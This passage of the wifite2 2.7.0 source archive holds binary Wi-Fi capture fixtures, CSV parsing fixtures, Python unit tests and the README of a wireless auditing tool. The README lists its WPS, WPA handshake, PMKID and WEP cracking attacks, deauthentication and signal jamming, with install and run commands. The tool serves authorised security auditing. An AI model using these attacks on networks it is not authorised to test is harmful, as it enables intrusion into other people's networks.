<I7* 0PPPPZ  mkZ  mkZ  ➱ZppP:lw5mkmkO,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ  mkZppP:lw5mkmkObE,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ( CwȞZDppP:lw5mkmkP,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZTppP:lw5mkmkPӰ,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZbppP:lw5mkmkP,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ h mkZpppP:lw5mkmkPq,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ p mkZ|ppP:lw5mkmk P+,pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ  mkZ  Z @mklw5mkqZ lw5Z:lw5mkmkZ  mkZ yy@mklw5mkq1 YZWifi $020H`l@P-,Z lw5Z:lw5mkmk 1 $20H`l-= J ,@P'BC^b2/PJ;I7* Z  mkZ:lw5mkmk_!`+Z4 lw5Z lw5Z !!@mklw5mkqZ lw5Z lw5Zd tmkZl mkZ !!:lw5mkmk@Z mkZ ppP:.gmkmkP,4pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ ppP:.gmkmkP^4pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZ De Wo@Z ppP:.gmkmkPL5pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZF ppP:.gmkmkP5pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer C7$2.0B1.0TPWireless Router Archer C7 <I7* 0PPPPZF mkZ ppP:.gmkmkP5pd1YZWifi $ *20H`l-= J ,@P'BC^b2/ ݋PJD;G4Vx4mk!TP-LINK# Archer wifite2-2.7.0/tests/files/airmon.output0000644000175000017500000000037014437644461017461 0ustar sophiesophieNo interfering processes found PHY Interface Driver Chipset phy2 wlan0 rtl8187 Realtek Semiconductor Corp. RTL8187 (mac80211 monitor mode vif enabled for [phy2]wlan0 on [phy2]wlan0mon) (mac80211 station mode vif disabled for [phy2]wlan0) wifite2-2.7.0/tests/files/airodump-weird-ssids.csv0000644000175000017500000000216114437644461021502 0ustar sophiesophie BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key AA:BB:CC:DD:EE:FF, 2018-04-06 18:21:23, 2018-04-06 18:21:24, 10, 54, WPA2, CCMP,PSK, -34, 5, 0, 0. 0. 0. 0, 24, Comma\, no trailing space, AA:BB:CC:DD:EE:FF, 2018-04-06 18:19:17, 2018-04-06 18:19:19, 10, 54, WPA2, CCMP,PSK, -35, 18, 0, 0. 0. 0. 0, 20, \"Quoted ESSID\, Comma\, no trailing spaces. \", AA:BB:CC:DD:EE:FF, 2018-04-06 18:35:29, 2018-04-06 18:35:30, 10, 54, WPA2, CCMP,PSK, -31, 12, 0, 0. 0. 0. 0, 22, "Comma\, Trailing space ", AA:BB:CC:DD:EE:FF, 2018-04-06 18:22:45, 2018-04-06 18:22:46, 10, 54, WPA2, CCMP,PSK, -29, 15, 0, 0. 0. 0. 0, 30, "\"quote\" comma\, trailing space ", AA:BB:CC:DD:EE:FF, 2018-04-06 18:50:11, 2018-04-06 18:50:17, 10, 54, WPA2, CCMP,PSK, -20, 43, 0, 0. 0. 0. 0, 19, \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00, Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs wifite2-2.7.0/tests/files/contains_wps_network.cap0000644000175000017500000002445014437644461021664 0ustar sophiesophieòilU^+k:+k:P4d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0PJDI7* lU  &DlU  &DlU  -lU $ d&DD20plU \ &DlU ^ &DD20p.lU b &DD20plU f &DD20p/?lU &DlU &DlU &DlU &DD20p`4?lU &DD20plU &DD20p5lU &DD20p 5lU P&DD20plU &DD20p5lU @&DD20plU &DlU &DlU &DD20p6lU &DD20plU &DlU &DlU t &DlU x &DD20p 7lU #D2y lU n r-lU v-D20plU ` -lU R&DD20plU 0$(GlUhD20p-lU j n-lU r -lUf pZ@lU &DlU &DD20p7lU' $(G;xlU# $tulU P:hmS.+k:+k:e'd1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU" +k:lU#D qJlUP P:hmS.+k:+k:x'd1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUd P:hmS.+k:+k:'d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU  ~-lU"H:+k:hmS.+k:TlU hmS.lU/8H:+k:hmS.+k:TlU< hmS.lU r -lU hmS.lUP:hmS.+k:+k: ,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUP:hmS.+k:+k:8,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU P:hmS.+k:+k: R,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU lιݜlU#H:+k:hmS.+k:VlU hmS.lU#\H:+k:hmS.+k:VlU` hmS.lU0H:+k:hmS.+k:VlU hmS.lU/H:+k:hmS.+k:VlU hmS.lU#L H:+k:hmS.+k:VlUN hmS.lU H:+k:hmS.+k:VlU hmS.lU/zH:+k:hmS.+k:WlU| hmS.lU$H:+k:hmS.+k:0WlU hmS.lU#fH:+k:hmS.+k:@WlUl hmS.lU/TH:+k:hmS.+k:PWlUX hmS.lU%H:+k:hmS.+k:`WlU hmS.lU#H:+k:hmS.+k:pWlU hmS.lU~H:+k:hmS.+k:WlU hmS.lU Z D20p-lU D20p-lU D20p-lU  -lU j &DlU HlUn pZ@lU  HlU D20plU  HlU HD20plUP:hmS.+k:+k:07[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU) +k:lU) $tulU*2 $tulU<P:hmS.+k:+k:@Q[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUHP:hmS.+k:+k:@[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU*L +k:lU-^ 䏟lU-v $tulUyP:hmS.+k:+k:P~[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUP:hmS.+k:+k:P[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU- +k:lU  HlU * -lU rD&DD20plU &DD20plU &DD20p;lU &DD20p@<lU &DlU  &DD20p@lU  H&DD20plU &DlU  &DD20pAlU  &DlU  &DD20p AlU $ &DD20p@AlU &DD20plU &DD20pAlU &DlU &DlU &DlU &DD20p`E?lU n &DlU v &DD20pFlU z &DD20p0FlU -޳ޠlUB pZ@lUI #D2ylU v -lU +#lU 0 &DlUn pZ@lUl hmS.lUp:hmS.+k:+k:lU(t +k:lU)xnn:+k:hmS.+k:]1 Test Router Please Ignore$0Hl!$ 02 `PlU| hmS.lU -lUbb:hmS.+k:+k:1 $20H`lP'BC^b2/PJ;I7* lU) +k:lU :hmS.+k:+k:_3 T!m2m?elU( +k:lU( :+k:hmS.+k: u T`6N; wckN\z-s x, .'0lU  hmS.lU&:hmS.+k:+k:3 T!m2m?eq|sDa/8r*+6"k~T~W{}'Lf7<l{~lU*6:+k:hmS.+k: _ T`6N; wckN\z-p$"mplU8 hmS.lU4<NNA,+k:hmS.+k: ^3w21} qƐk}IX`ՄvƬm碤lU,D +k:lU VLLB+k:hmS.@`Ĺ8: >qG };㰥[d8|PlU^LLB+k:hmS.P`(iLe_s;HX \ك^G:,&@ȣ`ۅKlU)N +k:lU $(GlU HlUB33+k:hmS. `4dwK#Y+/,BT<}hUTTZB`&hu5~o. -l,"2Ol ʟ87?5(O`GoPڥv8K# (\<Cd3OCF8uW]@CR}ilU  C֤lU " CD20p@lU & C֤lU $(GlU4B NNA,+k:hmS. yPq =0eQ L^]+yJEhH%lU$D hmS.lUH LLB+k:hmS.#`0Oq}CSұ}-:OlUH:+k:hmS.+k:^lU hmS.lU0H :+k:hmS.+k:^lU hmS.lU*H :+k:hmS.+k:^lU hmS.lU3A,+k:hmS.33 f"VDc6M\pMe GzG4.x0__aGR _n4v\z_Uhz11m JTG9n8Yra L.zz{`k_zF=>UnkBU?@ѿ8lUB33+k:hmS. %`8Gڋ?a ,PMT?L+ZGA F;pwܣr ָZxg (p#uX۲rރ2tz(Js.@}b}/q=@{^t*-d2beQF"uWd($ιcwifite2-2.7.0/tests/files/handshake_exists.cap0000644000175000017500000002445014437644461020731 0ustar sophiesophieòilU^+k:+k:P4d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0PJDI7* lU  &DlU  &DlU  -lU $ d&DD20plU \ &DlU ^ &DD20p.lU b &DD20plU f &DD20p/?lU &DlU &DlU &DlU &DD20p`4?lU &DD20plU &DD20p5lU &DD20p 5lU P&DD20plU &DD20p5lU @&DD20plU &DlU &DlU &DD20p6lU &DD20plU &DlU &DlU t &DlU x &DD20p 7lU #D2y lU n r-lU v-D20plU ` -lU R&DD20plU 0$(GlUhD20p-lU j n-lU r -lUf pZ@lU &DlU &DD20p7lU' $(G;xlU# $tulU P:hmS.+k:+k:e'd1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU" +k:lU#D qJlUP P:hmS.+k:+k:x'd1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUd P:hmS.+k:+k:'d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU  ~-lU"H:+k:hmS.+k:TlU hmS.lU/8H:+k:hmS.+k:TlU< hmS.lU r -lU hmS.lUP:hmS.+k:+k: ,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUP:hmS.+k:+k:8,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU P:hmS.+k:+k: R,d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU lιݜlU#H:+k:hmS.+k:VlU hmS.lU#\H:+k:hmS.+k:VlU` hmS.lU0H:+k:hmS.+k:VlU hmS.lU/H:+k:hmS.+k:VlU hmS.lU#L H:+k:hmS.+k:VlUN hmS.lU H:+k:hmS.+k:VlU hmS.lU/zH:+k:hmS.+k:WlU| hmS.lU$H:+k:hmS.+k:0WlU hmS.lU#fH:+k:hmS.+k:@WlUl hmS.lU/TH:+k:hmS.+k:PWlUX hmS.lU%H:+k:hmS.+k:`WlU hmS.lU#H:+k:hmS.+k:pWlU hmS.lU~H:+k:hmS.+k:WlU hmS.lU Z D20p-lU D20p-lU D20p-lU  -lU j &DlU HlUn pZ@lU  HlU D20plU  HlU HD20plUP:hmS.+k:+k:07[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU) +k:lU) $tulU*2 $tulU<P:hmS.+k:+k:@Q[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUHP:hmS.+k:+k:@[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU*L +k:lU-^ 䏟lU-v $tulUyP:hmS.+k:+k:P~[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lUP:hmS.+k:+k:P[d1Test Router Please Ignore $ *20H`lP'BC^b2/ 0݋PJD;GpB{X+k:!NTGR#WNR2000$V5B a42b8c166b3aTPWNR2000v5(Wireless AP) <I7* lU- +k:lU  HlU * -lU rD&DD20plU &DD20plU &DD20p;lU &DD20p@<lU &DlU  &DD20p@lU  H&DD20plU &DlU  &DD20pAlU  &DlU  &DD20p AlU $ &DD20p@AlU &DD20plU &DD20pAlU &DlU &DlU &DlU &DD20p`E?lU n &DlU v &DD20pFlU z &DD20p0FlU -޳ޠlUB pZ@lUI #D2ylU v -lU +#lU 0 &DlUn pZ@lUl hmS.lUp:hmS.+k:+k:lU(t +k:lU)xnn:+k:hmS.+k:]1 Test Router Please Ignore$0Hl!$ 02 `PlU| hmS.lU -lUbb:hmS.+k:+k:1 $20H`lP'BC^b2/PJ;I7* lU) +k:lU :hmS.+k:+k:_3 T!m2m?elU( +k:lU( :+k:hmS.+k: u T`6N; wckN\z-s x, .'0lU  hmS.lU&:hmS.+k:+k:3 T!m2m?eq|sDa/8r*+6"k~T~W{}'Lf7<l{~lU*6:+k:hmS.+k: _ T`6N; wckN\z-p$"mplU8 hmS.lU4<NNA,+k:hmS.+k: ^3w21} qƐk}IX`ՄvƬm碤lU,D +k:lU VLLB+k:hmS.@`Ĺ8: >qG };㰥[d8|PlU^LLB+k:hmS.P`(iLe_s;HX \ك^G:,&@ȣ`ۅKlU)N +k:lU $(GlU HlUB33+k:hmS. `4dwK#Y+/,BT<}hUTTZB`&hu5~o. -l,"2Ol ʟ87?5(O`GoPڥv8K# (\<Cd3OCF8uW]@CR}ilU  C֤lU " CD20p@lU & C֤lU $(GlU4B NNA,+k:hmS. yPq =0eQ L^]+yJEhH%lU$D hmS.lUH LLB+k:hmS.#`0Oq}CSұ}-:OlUH:+k:hmS.+k:^lU hmS.lU0H :+k:hmS.+k:^lU hmS.lU*H :+k:hmS.+k:^lU hmS.lU3A,+k:hmS.33 f"VDc6M\pMe GzG4.x0__aGR _n4v\z_Uhz11m JTG9n8Yra L.zz{`k_zF=>UnkBU?@ѿ8lUB33+k:hmS. %`8Gڋ?a ,PMT?L+ZGA F;pwܣr ָZxg (p#uX۲rރ2tz(Js.@}b}/q=@{^t*-d2beQF"uWd($ιcwifite2-2.7.0/tests/__init__.py0000644000175000017500000000000014437644461015707 0ustar sophiesophiewifite2-2.7.0/tests/test_Airmon.py0000644000175000017500000000154114437644461016447 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import unittest from wifite.tools.airmon import Airmon sys.path.insert(0, '..') class TestAirmon(unittest.TestCase): def test_airmon_start(self): # From https://github.com/derv82/wifite2/issues/67 stdout = ('\n' 'PHY Interface Driver Chipset\n' '\n' 'phy0 wlan0 iwlwifi Intel Corporation Centrino Ultimate-N 6300 (rev 3e)\n' '\n' ' (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)\n' ' (mac80211 station mode vif disabled for [phy0]wlan0)\n') mon_iface = Airmon._parse_airmon_start(stdout) assert mon_iface == 'wlan0mon', f'Expected monitor-mode interface to be "wlan0mon" but got "{mon_iface}"' wifite2-2.7.0/tests/test_Handshake.py0000644000175000017500000000401214437644461017104 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import sys import unittest from wifite.model.handshake import Handshake from wifite.util.process import Process sys.path.insert(0, '..') class TestHandshake(unittest.TestCase): """ Test suite for Target parsing an generation """ def getFile(self, filename): """ Helper method to parse targets from filename """ import os import inspect this_file = os.path.abspath(inspect.getsourcefile(self.getFile)) this_dir = os.path.dirname(this_file) return os.path.join(this_dir, 'files', filename) def testAnalyze(self): hs_file = self.getFile("handshake_exists.cap") hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A') try: hs.analyze() except Exception: exit() @unittest.skipUnless(Process.exists("tshark"), 'tshark is missing') def testHandshakeTshark(self): print("\nTesting handshake with tshark...") hs_file = self.getFile("handshake_exists.cap") hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A') assert (len(hs.tshark_handshakes()) > 0), f'Expected len>0 but got len({len(hs.tshark_handshakes())})' @unittest.skipUnless(Process.exists("cowpatty"), 'cowpatty is missing') def testHandshakeCowpatty(self): print("\nTesting handshake with cowpatty...") hs_file = self.getFile('handshake_exists.cap') hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A') assert (len(hs.cowpatty_handshakes()) > 0), f'Expected len>0 but got len({len(hs.cowpatty_handshakes())})' @unittest.skipUnless(Process.exists("aircrack-ng"), 'aircrack-ng is missing') def testHandshakeAircrack(self): print("\nTesting handshake with aircrack-ng...") hs_file = self.getFile('handshake_exists.cap') hs = Handshake(hs_file, bssid='A4:2B:8C:16:6B:3A') assert (len(hs.aircrack_handshakes()) > 0), f'Expected len>0 but got len({len(hs.aircrack_handshakes())})' if __name__ == '__main__': unittest.main() wifite2-2.7.0/tests/test_Target.py0000644000175000017500000000220514437644461016446 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import unittest from wifite.tools.airodump import Airodump class TestTarget(unittest.TestCase): """ Test suite for Target parsing an generation """ airodump_csv = 'airodump.csv' def getTargets(self, filename): """ Helper method to parse targets from filename """ import os import inspect this_file = os.path.abspath(inspect.getsourcefile(TestTarget.getTargets)) this_dir = os.path.dirname(this_file) csv_file = os.path.join(this_dir, 'files', filename) # Load targets from CSV file return Airodump.get_targets_from_csv(csv_file) def testTargetParsing(self): """ Asserts target parsing finds targets """ targets = self.getTargets(TestTarget.airodump_csv) assert(len(targets) > 0) def testTargetClients(self): """ Asserts target parsing captures clients properly """ targets = self.getTargets(TestTarget.airodump_csv) for t in targets: if t.bssid == '00:1D:D5:9B:11:00': assert(len(t.clients) > 0) if __name__ == '__main__': unittest.main() wifite2-2.7.0/tests/test_Airodump.py0000644000175000017500000000445514437644461017011 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import sys from wifite.tools.airodump import Airodump import unittest sys.path.insert(0, '..') class TestAirodump(unittest.TestCase): """ Test suite for Wifite's interaction with the Airodump tool """ def test_airodump(self): csv_filename = self.getFile('airodump.csv') targets = Airodump.get_targets_from_csv(csv_filename) print('') for target in targets: print("Testing ESSID: ", target.essid) if target.essid is not None: assert target.essid_len == len(target.essid), \ f'ESSID length is {target.essid_len} but ESSID is {len(target.essid)} - [{target.essid}]' def test_airodump_weird_characters(self): csv_filename = self.getFile('airodump-weird-ssids.csv') targets = Airodump.get_targets_from_csv(csv_filename) target = targets[0] expected = 'Comma, no trailing space' assert target.essid == expected, f'Expected ESSID ({expected}) but got ({target.essid})' target = targets[1] expected = '"Quoted ESSID, Comma, no trailing spaces. "' assert target.essid == expected, f'Expected ESSID ({expected}) but got ({target.essid})' target = targets[2] expected = 'Comma, Trailing space ' assert target.essid == expected, f'Expected ESSID ({expected}) but got ({target.essid})' target = targets[3] expected = '"quote" comma, trailing space ' assert target.essid == expected, f'Expected ESSID ({expected}) but got ({target.essid})' # Hidden access point target = targets[4] assert target.essid_known is False, 'ESSID full of null characters should not be known' expected = None assert target.essid == expected, f'Expected ESSID ({expected}) but got ({target.essid})' assert target.essid_len == 19, f'ESSID [unknow chars] length should be 19, but got {target.essid_len}' def getFile(self, filename): """ Helper method to parse targets from filename """ import os import inspect this_file = os.path.abspath(inspect.getsourcefile(self.getFile)) this_dir = os.path.dirname(this_file) return os.path.join(this_dir, 'files', filename) if __name__ == '__main__': unittest.main() wifite2-2.7.0/bin/0000755000175000017500000000000014437644461013216 5ustar sophiesophiewifite2-2.7.0/bin/wifite0000755000175000017500000000011214437644461014425 0ustar sophiesophie#!/usr/bin/env python from wifite import __main__ __main__.entry_point() wifite2-2.7.0/README.md0000644000175000017500000002323614437644461013733 0ustar sophiesophie[![GitHub version](https://img.shields.io/badge/version-2.7.0-informational.svg)](#) [![GitHub issues](https://img.shields.io/github/issues/kimocoder/wifite2.svg)](https://github.com/kimocoder/wifite2/issues) [![GitHub forks](https://img.shields.io/github/forks/kimocoder/wifite2.svg)](https://github.com/kimocoder/wifite2/network) [![GitHub stars](https://img.shields.io/github/stars/kimocoder/wifite2.svg)](https://github.com/kimocoder/wifite2/stargazers) [![Android Supported](https://img.shields.io/badge/Android-Supported-green.svg)](#) [![GitHub license](https://img.shields.io/github/license/kimocoder/wifite2.svg)](https://github.com/kimocoder/wifite2/blob/master/LICENSE) Wifite ====== This repo is a complete re-write of [`wifite`](https://github.com/derv82/wifite), a Python script for auditing wireless networks. Wifite runs existing wireless-auditing tools for you. Stop memorizing command arguments & switches! Wifite is designed to use all known methods for retrieving the password of a wireless access point (router). These methods include: 1. WPS: The [Offline Pixie-Dust attack](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Offline_brute-force_attack) 1. WPS: The [Online Brute-Force PIN attack](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Online_brute-force_attack)
WPS: The [Offline NULL PIN attack](https://github.com/t6x/reaver-wps-fork-t6x/wiki/Introducing-a-new-way-to-crack-WPS:-Option--p-with-an-Arbitrary-String) 2. WPA: The [WPA Handshake Capture](https://hashcat.net/forum/thread-7717.html) + offline crack. 3. WPA: The [PMKID Hash Capture](https://hashcat.net/forum/thread-7717.html) + offline crack. 4. WEP: Various known attacks against WEP, including *fragmentation*, *chop-chop*, *aireplay*, etc. 5. WIFI Signal jammer, block specific accesspoints or multiple. signal jamming only works for specific Atheros WiFi chipsets. Run wifite, select your targets, and Wifite will automatically start trying to capture or crack the password. Supported Operating Systems --------------------------- Wifite is designed specifically for the latest version of [**Kali** Linux](https://www.kali.org/). [ParrotSec](https://www.parrotsec.org/) is also supported. NetHunter (Android) is also widely supported by wifite, but it will require a custom kernel with modules support and various patches for injection in order to work. Tested on Android 10 (Q), Android 11 (R), Android 12 (S) and Android 13 (T) More information regarding [ Android: **NetHunter** ](https://gitlab.com/kalilinux/nethunter) is found there and you should also take a look at the [ **NetHunter WIKI** ](https://www.kali.org/docs/nethunter/) which is more up to date then [ NetHunter.com ](https://nethunter.com). Other pen-testing distributions (such as BackBox or Ubuntu) have outdated versions of the tools used by Wifite. Do not expect support unless you are using the latest versions of the *Required Tools*, and also [patched wireless drivers that support injection](). Required Tools -------------- First and foremost, you will need a wireless card capable of "Monitor Mode" and packet injection (see [this tutorial for checking if your wireless card is compatible](https://www.aircrack-ng.org/doku.php?id=compatible_cards) and also [this guide](https://en.wikipedia.org/wiki/Wi-Fi_Protected_Setup#Offline_brute-force_attack)). There are many cheap wireless cards that plug into USB available from online stores. Second, only the latest versions of these programs are supported and must be installed for Wifite to work properly: **Required:** * Suggest using `python3` as `python2` was marked deprecated as of january 2020. * As we moved from older python and changed to fully support and run on `python3.11` * [`Iw`](https://wireless.wiki.kernel.org/en/users/documentation/iw): For identifying wireless devices already in Monitor Mode. * [`Ip`](https://packages.debian.org/buster/net-tools): For starting/stopping wireless devices. * [`Aircrack-ng`](https://aircrack-ng.org/) suite, includes: * [`airmon-ng`](https://tools.kali.org/wireless-attacks/airmon-ng): For enumerating and enabling Monitor Mode on wireless devices. * [`aircrack-ng`](https://tools.kali.org/wireless-attacks/aircrack-ng): For cracking WEP .cap files and WPA handshake captures. * [`aireplay-ng`](https://tools.kali.org/wireless-attacks/aireplay-ng): For deauthing access points, replaying capture files, various WEP attacks. * [`airodump-ng`](https://tools.kali.org/wireless-attacks/airodump-ng): For target scanning & capture file generation. * [`packetforge-ng`](https://tools.kali.org/wireless-attacks/packetforge-ng): For forging capture files. **Optional, but Recommended:** * [`tshark`](https://www.wireshark.org/docs/man-pages/tshark.html): For detecting WPS networks and inspecting handshake capture files. * [`reaver`](https://github.com/t6x/reaver-wps-fork-t6x): For WPS Pixie-Dust & brute-force attacks. * Note: Reaver's `wash` tool can be used to detect WPS networks if `tshark` is not found. * [`bully`](https://github.com/aanarchyy/bully): For WPS Pixie-Dust & brute-force attacks. * Alternative to Reaver. Specify `--bully` to use Bully instead of Reaver. * Bully is also used to fetch PSK if `reaver` cannot after cracking WPS PIN. * [`john`](https://www.openwall.com/john): For CPU (OpenCL)/GPU cracking passwords fast. * [`coWPAtty`](https://tools.kali.org/wireless-attacks/cowpatty): For detecting handshake captures. * [`hashcat`](https://hashcat.net/): For cracking PMKID hashes. * [`hcxdumptool`](https://github.com/ZerBea/hcxdumptool): For capturing PMKID hashes. * [`hcxpcapngtool`](https://github.com/ZerBea/hcxtools): For converting PMKID packet captures into `hashcat`'s format. Install dependencies -------------------- Either, do it the proper python way with ```sh $ pip3 install -r requirements.txt ``` Run Wifite ---------- ```sh $ git clone https://github.com/kimocoder/wifite2.git $ cd wifite2 $ sudo ./wifite.py ``` Install Wifite -------------- To install onto your computer (so you can just run `wifite` from any terminal), again, the choice is the old fashioned way of python .. ```sh $ sudo python3 setup.py install ``` This will install `wifite` to `/usr/sbin/wifite` which should be in your terminal path. Brief Feature List ------------------ * [PMKID hash capture](https://hashcat.net/forum/thread-7717.html) (enabled by-default, force with: `--pmkid`) * WPS Offline Brute-Force Attack aka "Pixie-Dust". (enabled by-default, force with: `--wps-only --pixie`) * WPS Online Brute-Force Attack aka "PIN attack". (enabled by-default, force with: `--wps-only --no-pixie`) * WPA/2 Offline Brute-Force Attack via 4-Way Handshake capture (enabled by-default, force with: `--no-wps`) * Validates handshakes against `tshark`, `cowpatty`, and `aircrack-ng` (when available) * Various WEP attacks (replay, chopchop, fragment, hirte, p0841, caffe-latte) * Automatically decloaks hidden access points while scanning or attacking. * Note: Only works when channel is fixed. Use `-c ` * Disable this using `--no-deauths` * 5Ghz support for some wireless cards (via `-5` switch). * Note: Some tools don't play well on 5GHz channels (e.g. `aireplay-ng`) * Stores cracked passwords and handshakes to the current directory (`--cracked`) * Includes information about the cracked access point (Name, BSSID, Date, etc). * Easy to try to crack handshakes or PMKID hashes against a wordlist (`--crack`) TIP! Use `wifite.py -h -v` for a collection of switches and settings for your own customization, automation, timers and so on .. What's new? ----------- Comparing this repo to the "old wifite" @ https://github.com/derv82/wifite * **Less bugs** * Cleaner process management. Does not leave processes running in the background (the old `wifite` was bad about this). * No longer "one monolithic script". Has working unit tests. Pull requests are less-painful! * **Speed** * Target access points are refreshed every second instead of every 5 seconds. * **Accuracy** * Displays realtime Power level of currently-attacked target. * Displays more information during an attack (e.g. % during WEP chopchop attacks, Pixie-Dust step index, etc) * **Educational** * The `--verbose` option (expandable to `-vv` or `-vvv`) shows which commands are executed & the output of those commands. * This can help debug why Wifite is not working for you. Or so you can learn how these tools are used. * More-actively developed, with some help from the awesome open-source community. * Python 3 support. * Sweet new ASCII banner. What's gone? ------------ * Some command-line arguments (`--wept`, `--wpst`, and other confusing switches). * You can still access some of these obscure options, try `wifite -h -v` What's not new? --------------- * (Mostly) Backwards compatible with the original `wifite`'s arguments. * Same text-based interface everyone knows and loves. Screenshots ----------- NetHunter Android 13 (S) scanning for targets / target information ![Scanning for targets](https://i.imgur.com/IzXweSH.jpg) ------------- Cracking WPS PIN using `reaver`'s Pixie-Dust attack, then fetching WPA key using `bully`: ![Pixie-Dust with Reaver to get PIN and Bully to get PSK](https://i.imgur.com/Q5KSDbg.gif) ------------- Cracking WPA key using PMKID attack: ![PMKID attack](https://i.imgur.com/CR8oOp0.gif) ------------- Decloaking 